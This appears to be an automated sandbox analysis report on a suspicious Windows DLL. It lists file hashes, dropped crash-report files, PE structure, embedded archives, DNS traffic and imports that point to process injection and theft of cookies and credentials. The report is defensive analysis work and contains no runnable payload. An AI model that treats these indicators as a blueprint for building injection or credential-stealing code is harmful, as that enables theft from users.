                                                SHA-256:74D3C03945E2A0F8211980261729AC387EDD10FB56F6DDD5F5CA78B61FDF8EAF
                                                SHA-512:86C1FE4E3C75BA60CF81BEC9C5A0C409E25BC5F24FCC0FA6084D90CBD2D113BA3770E81A683C09B18874713A7DB4D3C391AEA284AF46E90F4F124412D9878B91
                                                Malicious:false
                                                Reputation:low
                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="839973" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER493B.tmp.dmp
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 30 22:23:07 2021, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):55552
                                                Entropy (8bit):1.962155911528806
                                                Encrypted:false
                                                SSDEEP:192:FciIrVXsfykKu65g9voRtOvi5QGd2K/WjZZdEyhZcw8InW:/w8fMuloRKvO27VZ2yhZ+IW
                                                MD5:C7014E8E5C3E4F741F04C9853D9797CF
                                                SHA1:FE187847ADBF96DB39301A1C1B04F30E3E3DB4E9
                                                SHA-256:EA37623DB683B059EFA3CB4954B86124F93301F3EC41F6CBDF0AED05298AEF88
                                                SHA-512:C8B0C4ADA17F15A753BF1CB71F3BDD3AF5A23FF1BBDED1427B41BFB9105AE34AE62227D30B899FC9C4897A1F8C4C59CFD531BB4A636837929279F5C9A734C394
                                                Malicious:false
                                                Reputation:low
                                                Preview: MDMP....... .......K..`...................U...........B......D ......GenuineIntelW...........T...........I..`.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C88.tmp.WERInternalMetadata.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8268
                                                Entropy (8bit):3.6953250354060008
                                                Encrypted:false
                                                SSDEEP:192:Rrl7r3GLNiMg6B6YAU6A2AgmfTZSBCprRx89bYQsf+Im:RrlsNir6B6Yj6A2AgmfTZSGeYjf4
                                                MD5:E3D77CF53ECF7ADB317D3A435DCD8159
                                                SHA1:D28D76FE62068ACB5D8F00D79923955617DB9998
                                                SHA-256:65DF5D85CE9B5BCABAD28554C8A00324EA2271DC2FD9464ADC2058E1D726619F
                                                SHA-512:5A297AC88ED72FFC3493E4072759293A4B52302719ECEE00A6B78070D63F7C4CC595C13ABE25E9F96149ACA7F3CC1593AF54248A772EED1DDC2C019AE2FF0693
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.9.6.<./.P.i.d.>.......
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DF0.tmp.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4629
                                                Entropy (8bit):4.472021705479319
                                                Encrypted:false
                                                SSDEEP:48:cvIwSD8zsxBJgtWI9G4WSC8BK8fm8M4JCdsfFD3+q8/o64SrSOd:uITfVdxSNNJr3KDWOd
                                                MD5:11E5F02DEF35759B3C71A7D954F0F740
                                                SHA1:BAE0F45B66F1045B6D690D071B391A1BC3D68F70
                                                SHA-256:D7AAABAB2E17E78EC0F35AC3A9E23CBBBA452F34E44C07E5A0F0F03B8CDAF03E
                                                SHA-512:9E84C713910BE1D55E4D061C54D97C8CDA5075C231D0126A02D356BE37CD59949DC10C55A9D8DE80761CCB8760E969CD182417B3B07D5165034963718434AA4A
                                                Malicious:false
                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="839973" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5CB4.tmp.dmp
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 30 22:23:12 2021, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):50486
                                                Entropy (8bit):2.1510325720772263
                                                Encrypted:false
                                                SSDEEP:192:4i5J9Tm4BswRJDrI/QtC0cyflT5wkMQGd2K/WjZvB4Zp6w+jtgief6nLd:PJ9TmHwRJHQ3gO27VvqrF+jtASLd
                                                MD5:8408AA93B0C2C7F26D17D6D77B2C9832
                                                SHA1:63DA04E109DD39C3848A024E5E6BA1A3531F4D4B
                                                SHA-256:C99BD6708DD3A2B4C06BB07717D57723437098322F361CF951A41258210E99E7
                                                SHA-512:980E2D62707C2278EAF476907E7F7DA4801CC6D6FAA1F37A2C1D8A0238B0A6A80875C516B34B6054326BDD7859988AAF1B24E4DA64BE25AAB598A29BEBA89C01
                                                Malicious:false
                                                Preview: MDMP....... .......P..`...................U...........B......D ......GenuineIntelW...........T.......\...L..`.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5EA9.tmp.WERInternalMetadata.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8248
                                                Entropy (8bit):3.693363910446504
                                                Encrypted:false
                                                SSDEEP:192:Rrl7r3GLNilM86F6YAg6ApgmfTuSBCpr989bDlsfMBm:RrlsNiF6F6YP6ApgmfTuSLD+fH
                                                MD5:A6CB8208BC27FA8FBA080B2E4D8BDD71
                                                SHA1:6215C7F1D310652F0A034ABAFF81E47DDC288508
                                                SHA-256:B762FAE10CCC9B0C448F8C9AED1AD334E847C464595377410972690F4AB6AEA1
                                                SHA-512:669B97305AC45D8D85B1A173C4ACE63AC58042570F0C7BCCC2850D6BA7D075D6989069896ACFA94071515F3F1B070AB4D20AE98263834F2387F2E79639615609
                                                Malicious:false
                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.4.<./.P.i.d.>.......
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F65.tmp.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4629
                                                Entropy (8bit):4.4740213509877185
                                                Encrypted:false
                                                SSDEEP:48:cvIwSD8zsxBJgtWI9G4WSC8Bq28fm8M4JCdsUFoi+q8/oqq4SrSBd:uITfVdxSNMJoaqDWBd
                                                MD5:33574F790F04EE4F15C8FD5D7F13B70F
                                                SHA1:D52A243595682BD5C96A40824A2D9B1475A8411D
                                                SHA-256:88413B191DD655B8B29D8FE0A469109C8867D9E8E97766F7B2D8F146067F7D95
                                                SHA-512:4E9040A48134C860CFE35DD67EE6FBFF8DF44B86ABC739B384CFD1F266A5D532B82B7E8F8B63CBF3502C0080B025F0E3FEECA9C01E139CA75F1542A504C2E325
                                                Malicious:false
                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="839973" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                Static File Info

                                                General

                                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.4522280470694
                                                TrID:
                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                • DOS Executable Generic (2002/1) 0.20%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:A8xYhQFvXo.dll
                                                File size:4890624
                                                MD5:83dd317c95f4acb8623d1f024945cfdb
                                                SHA1:04f9227cc3bfde5626be669be106a5d38f4416b1
                                                SHA256:5b2f060f1512100a0d500312fa579cdad9d3ea101778838173aa7215cd39700a
                                                SHA512:93cddc6bb6957e38d2485bea380d19b8291d3069d78e03cff58a792a5d6c5a56b983b34f166379a0ff9d1e009a461f71c21a59e98de8081503d9364ad91deb41
                                                SSDEEP:98304:jEn4O4Kkolx67k+Yj6i7SVSVSRDEdxA0L6EwSls/9kXUVje32C:jE4O4KW4rj6ESVSVSR/i6Ewb98d2C
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......JG ..&N..&N..&N......&N...0..&N.).3./&N.). .@&N.).#.9'N..)...&N..)...&N..&O.4'N.).<.I&N.).4..&N.).2..&N.).6..&N.Rich.&N........

                                                File Icon

                                                Icon Hash:74f0e4ecccdce0e4

                                                Static PE Info

                                                General

                                                Entrypoint:0x100288f0
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x10000000
                                                Subsystem:windows gui
                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                DLL Characteristics:
                                                Time Stamp:0x5F9F5377 [Mon Nov 2 00:31:51 2020 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:7438c2384f3e113e7ab9f88b1b5e5108

                                                Entrypoint Preview

                                                Instruction
                                                cmp dword ptr [esp+08h], 01h
                                                jne 00007EFCF482E9C7h
                                                call 00007EFCF483A812h
                                                push dword ptr [esp+04h]
                                                mov ecx, dword ptr [esp+10h]
                                                mov edx, dword ptr [esp+0Ch]
                                                call 00007EFCF482E8B2h
                                                pop ecx
                                                retn 000Ch
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 20h
                                                mov eax, dword ptr [ebp+08h]
                                                push esi
                                                push edi
                                                push 00000008h
                                                pop ecx
                                                mov esi, 10171808h
                                                lea edi, dword ptr [ebp-20h]
                                                rep movsd
                                                mov dword ptr [ebp-08h], eax
                                                mov eax, dword ptr [ebp+0Ch]
                                                test eax, eax
                                                pop edi
                                                mov dword ptr [ebp-04h], eax
                                                pop esi
                                                je 00007EFCF482E9CEh
                                                test byte ptr [eax], 00000008h
                                                je 00007EFCF482E9C9h
                                                mov dword ptr [ebp-0Ch], 01994000h
                                                lea eax, dword ptr [ebp-0Ch]
                                                push eax
                                                push dword ptr [ebp-10h]
                                                push dword ptr [ebp-1Ch]
                                                push dword ptr [ebp-20h]
                                                call dword ptr [10171320h]
                                                leave
                                                retn 0008h
                                                push ebp
                                                mov ebp, esp
                                                push ecx
                                                push ebx
                                                mov eax, dword ptr [ebp+0Ch]
                                                add eax, 0Ch
                                                mov dword ptr [ebp-04h], eax
                                                mov ebx, dword ptr fs:[00000000h]
                                                mov eax, dword ptr [ebx]
                                                mov dword ptr fs:[00000000h], eax
                                                mov eax, dword ptr [ebp+08h]
                                                mov ebx, dword ptr [ebp+0Ch]
                                                mov ebp, dword ptr [ebp-04h]
                                                mov esp, dword ptr [ebx-04h]
                                                jmp eax
                                                pop ebx
                                                leave
                                                retn 0008h
                                                pop eax
                                                pop ecx
                                                xchg dword ptr [esp], eax
                                                jmp eax
                                                push ebp
                                                mov ebp, esp
                                                push ecx
                                                push ecx
                                                push ebx
                                                push esi
                                                push edi
                                                mov esi, dword ptr fs:[00000000h]
                                                mov dword ptr [ebp-04h], esi
                                                mov dword ptr [ebp-08h], 100289BBh
                                                push 00000000h
                                                push dword ptr [ebp+0Ch]
                                                push dword ptr [ebp-08h]
                                                push dword ptr [ebp+08h]
                                                call 00007EFCF482E9E2h

                                                Rich Headers

                                                Programming Language:
                                                • [RES] VS2005 build 50727
                                                • [ C ] VS2005 build 50727
                                                • [EXP] VS2005 build 50727
                                                • [C++] VS2005 build 50727
                                                • [ASM] VS2005 build 50727
                                                • [LNK] VS2005 build 50727

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x2885700x6e.rdata
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x286c3c0x118.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x4090000x98db0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a20000xb370.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x27b6580x40.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x1710000x4dc.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x16ff8b0x170000False0.486878104832data6.46262078477IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata0x1710000x1175de0x118000False0.4536996024data6.46893668097IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x2890000x17f0e40x179000False0.952282488188data7.96722658693IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .rsrc0x4090000x98db00x99000False0.999259599673data7.99961057955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x4a20000xea200xf000False0.511735026042data5.63038298318IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                CRX0x4091500x93697-zip archive data, version 0.3EnglishUnited States
                                                FF0x4124bc0x870507-zip archive data, version 0.3EnglishUnited States
                                                FRIENDS0x49950c0x884a7-zip archive data, version 0.3EnglishUnited States
                                                RT_MANIFEST0x4a1d580x56ASCII text, with CRLF line terminatorsEnglishUnited States

                                                Imports

                                                DLLImport
                                                KERNEL32.dllSetFilePointer, MapViewOfFile, UnmapViewOfFile, SetEndOfFile, HeapAlloc, QueryPerformanceCounter, HeapFree, WaitForSingleObject, InterlockedCompareExchange, UnlockFile, FlushViewOfFile, LockFile, WaitForSingleObjectEx, OutputDebugStringW, GetTickCount, UnlockFileEx, GetProcessHeap, GetSystemTimeAsFileTime, FormatMessageA, InitializeCriticalSection, LoadLibraryW, FormatMessageW, HeapDestroy, LeaveCriticalSection, GetFileAttributesA, HeapCreate, HeapValidate, GetFileAttributesW, FlushFileBuffers, GetTempPathW, HeapSize, LockFileEx, EnterCriticalSection, GetDiskFreeSpaceW, CreateFileMappingA, CreateFileMappingW, GetDiskFreeSpaceA, GetSystemInfo, GetFileAttributesExW, DeleteCriticalSection, GetCurrentThreadId, GetVersionExA, DeleteFileW, HeapCompact, GetTempPathA, AreFileApisANSI, WinExec, GetPrivateProfileStringA, CreateSemaphoreA, VirtualFree, VirtualAlloc, GetLocalTime, OpenFileMappingA, lstrcpynA, CopyFileA, SetFileAttributesA, FindResourceA, LoadResource, SizeofResource, MoveFileA, LockResource, GetWindowsDirectoryA, GetThreadContext, SetThreadContext, VirtualAllocEx, GetModuleHandleA, WriteProcessMemory, ResumeThread, GetThreadLocale, GetFileInformationByHandle, GetDriveTypeA, FileTimeToLocalFileTime, FileTimeToSystemTime, CreateMutexW, HeapReAlloc, GetFullPathNameA, GetFullPathNameW, GetModuleHandleW, DeviceIoControl, CreateFileW, GetVersionExW, GetVolumeInformationW, GetSystemDirectoryW, GetComputerNameW, OutputDebugStringA, DeleteFileA, GetSystemTime, LocalFree, CloseHandle, CreateMutexA, FindNextFileA, LocalAlloc, OpenMutexA, LoadLibraryA, FindClose, GetProcAddress, GetLastError, FindFirstFileA, MultiByteToWideChar, GetTimeZoneInformation, ReadFile, CreateProcessA, WideCharToMultiByte, WriteFile, CompareFileTime, GetCurrentProcess, SystemTimeToFileTime, FreeLibrary, lstrlenA, GetFileSize, CreateFileA, GetStringTypeExA, GetSystemDirectoryA, ExpandEnvironmentStringsA, WaitForMultipleObjects, PeekNamedPipe, SleepEx, SetCurrentDirectoryA, SetFileTime, SetFileAttributesW, CreateDirectoryW, GetCurrentDirectoryA, SetEnvironmentVariableA, GetCurrentProcessId, Sleep, CompareStringW, CompareStringA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, GetLocaleInfoW, IsValidCodePage, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, GetStringTypeW, GetStringTypeA, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetConsoleMode, GetConsoleCP, GetStartupInfoA, GetFileType, SetHandleCount, GetModuleFileNameA, GetStdHandle, ExitProcess, InterlockedIncrement, InterlockedDecrement, InterlockedExchange, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, CreateDirectoryA, ExitThread, CreateThread, GetCommandLineA, RaiseException, RtlUnwind, GetCPInfo, LCMapStringA, LCMapStringW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetACP, GetOEMCP
                                                USER32.dllwsprintfA, LoadStringA, wsprintfW, GetSystemMetrics
                                                ADVAPI32.dllGetSidIdentifierAuthority, CryptDestroyKey, CryptEncrypt, CryptReleaseContext, CryptImportKey, CryptAcquireContextA, GetSecurityDescriptorSacl, SetSecurityInfo, ControlService, OpenSCManagerA, StartServiceA, CreateServiceA, DeleteService, CloseServiceHandle, OpenServiceA, LookupAccountNameW, GetSidSubAuthorityCount, GetSidSubAuthority, CryptCreateHash, RegCloseKey, RegEnumKeyExW, RegOpenKeyExW, RegOpenKeyExA, RegCreateKeyExA, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegQueryValueExW, LookupAccountSidA, RegQueryValueExA, RegSetValueExA, GetTokenInformation, OpenProcessToken, CryptDestroyHash, CryptGetHashParam, CryptHashData
                                                SHELL32.dllSHGetPathFromIDListA, SHGetMalloc, SHGetSpecialFolderLocation, SHFileOperationA, SHGetSpecialFolderPathA
                                                ole32.dllCoInitialize, CoUninitialize, CoCreateInstance
                                                SHLWAPI.dllPathFindFileNameA, PathRemoveFileSpecA, PathFileExistsA, SHGetValueA
                                                WS2_32.dllgetpeername, closesocket, socket, connect, sendto, recvfrom, accept, listen, inet_addr, gethostbyname, inet_ntoa, getservbyname, gethostbyaddr, getservbyport, ioctlsocket, gethostname, getsockopt, htons, bind, ntohs, setsockopt, WSAIoctl, select, __WSAFDIsSet, WSASetLastError, send, recv, WSAGetLastError, WSAStartup, WSACleanup, htonl, getsockname, ntohl
                                                CRYPT32.dllCryptUnprotectData
                                                VERSION.dllGetFileVersionInfoA, GetFileVersionInfoSizeA, VerQueryValueA
                                                WINHTTP.dllWinHttpAddRequestHeaders, WinHttpQueryOption, WinHttpReceiveResponse, WinHttpSetTimeouts, WinHttpSetOption, WinHttpSendRequest, WinHttpConnect, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpQueryDataAvailable, WinHttpOpen, WinHttpOpenRequest, WinHttpReadData, WinHttpSetCredentials
                                                WININET.dllInternetGetCookieExA, InternetGetCookieA
                                                SETUPAPI.dllSetupDiGetDeviceRegistryPropertyA, SetupDiEnumDeviceInfo, SetupDiDestroyDeviceInfoList, SetupDiGetClassDevsA
                                                WLDAP32.dll

                                                Exports

                                                NameOrdinalAddress
                                                Hello00110x10148400
                                                Hello00220x10148370
                                                Hello00330x10148300

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Network Port Distribution

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 30, 2021 14:22:57.140047073 CET5598453192.168.2.38.8.8.8
                                                Jan 30, 2021 14:22:57.199223042 CET53559848.8.8.8192.168.2.3
                                                Jan 30, 2021 14:22:58.107640028 CET6418553192.168.2.38.8.8.8
                                                Jan 30, 2021 14:22:58.155550957 CET53641858.8.8.8192.168.2.3
                                                Jan 30, 2021 14:22:59.079483032 CET6511053192.168.2.38.8.8.8
                                                Jan 30, 2021 14:22:59.130264997 CET53651108.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:00.114022017 CET5836153192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:00.171459913 CET53583618.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:01.126566887 CET6349253192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:01.185852051 CET53634928.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:02.291366100 CET6083153192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:02.339575052 CET53608318.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:03.112068892 CET6010053192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:03.164654016 CET53601008.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:04.301146030 CET5319553192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:04.349097967 CET53531958.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:05.443454981 CET5014153192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:05.495985985 CET53501418.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:06.295280933 CET5302353192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:06.353816032 CET53530238.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:06.400911093 CET4956353192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:06.448723078 CET53495638.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:09.283931971 CET5135253192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:09.332432985 CET53513528.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:10.654191971 CET5934953192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:10.708065033 CET53593498.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:11.519303083 CET5708453192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:11.568506002 CET53570848.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:12.727240086 CET5882353192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:12.777928114 CET53588238.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:13.687099934 CET5756853192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:13.734935999 CET53575688.8.8.8192.168.2.3
                                                Jan 30, 2021 14:23:13.957366943 CET5054053192.168.2.38.8.8.8
                                                Jan 30, 2021 14:23:14.016382933 CET53505408.8.8.8192.168.2.3

                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: loaddll32.exe PID: 6628 Parent PID: 5680

                                                General

                                                Start time:14:23:01
                                                Start date:30/01/2021
                                                Path:C:\Windows\System32\loaddll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:loaddll32.exe 'C:\Users\user\Desktop\A8xYhQFvXo.dll'
                                                Imagebase:0x1240000
                                                File size:120832 bytes
